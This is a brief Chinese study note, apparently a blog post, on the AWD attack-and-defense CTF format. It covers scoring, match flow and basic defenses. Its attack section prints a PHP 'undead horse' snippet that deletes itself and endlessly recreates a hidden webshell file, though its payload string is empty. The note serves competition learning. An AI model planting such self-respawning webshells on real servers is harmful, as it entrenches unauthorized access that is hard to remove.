关于awd赛制的学习路程·awd的理论内容

什么是awd

AWD(Attack With Defense，攻防兼备)模式是一个非常有意思的模式，你需要在一场比赛里要扮演攻击方和防守方，攻者得分，失守者会被扣分。也就是说，攻击别人的靶机可以获取 Flag 分数时，别人会被扣分，同时你也要保护自己的主机不被别人得分，以防扣分。

在攻防模式中，参赛队伍分别防守同样配置的虚拟靶机，并在有限的博弈时间内，找到其他战队的薄弱环节进行攻击，同时要对自己的靶机环境进行加固防守。比赛采用零和积分方式，即每个战队都拥有相同的起始分数，挖掘网络服务漏洞并攻击对手服务取得flag获得积分，被攻击方扣减相应分数；修补自身服务漏洞进行防御来避免丢分，最终以得分高低直接分出胜负。

adw比赛的流程

1. 出题方会给每一支队伍部署同样环境的主机，主机有一台或者多台。
2. 拿到机器后每个队伍会有一定的加固时间或没有加固时间，这个视规则而定。
3. 每个服务、数据库、主机上都会可能存在 flag 字段，并且会定时刷新。通过攻击拿到 flag 后需要提交到裁判机进行得分，一般会提供指定的提交接口。下一轮刷新后，如果还存在该漏洞，可以继续利用漏洞获取 flag 进行得分。

防守

waf部署

一些waf软件部署，不过要看清要求，可能比赛并不允许一些waf

文件备份

备份网站文件，方便之后的恢复

后门扫描

扫扫看，看看有没有后门

文件监控

监控网站文件，防止被篡改和添加

攻击

不死马

ignore_user_abort(true);
    set_time_limit(0);
    @unlink(__FILE__);
    $file = '.ZYGS.php';
    $code = '';
    while (1){
        file_put_contents($file,$code);
        usleep(5000);
    }
?>

其他好用的工具

这个就靠平时的积累了